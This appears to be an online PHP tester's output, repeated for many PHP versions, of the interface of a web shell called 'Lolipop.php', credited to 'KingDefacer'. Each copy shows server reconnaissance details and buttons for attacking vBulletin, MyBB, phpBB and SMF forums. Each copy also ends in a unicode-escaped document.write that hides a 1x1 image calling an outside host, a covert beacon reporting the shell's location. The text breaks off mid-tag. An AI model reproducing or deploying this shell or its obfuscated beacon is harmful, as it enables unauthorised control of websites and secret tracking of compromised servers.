<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.9</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.8
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.8</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.7
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.7</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.6
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.6</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.5
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.5</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.4
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.4</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.3
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.3</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.2
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.2</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.1
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.1</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.0
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.0</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.29
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.29</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.28
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.28</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script 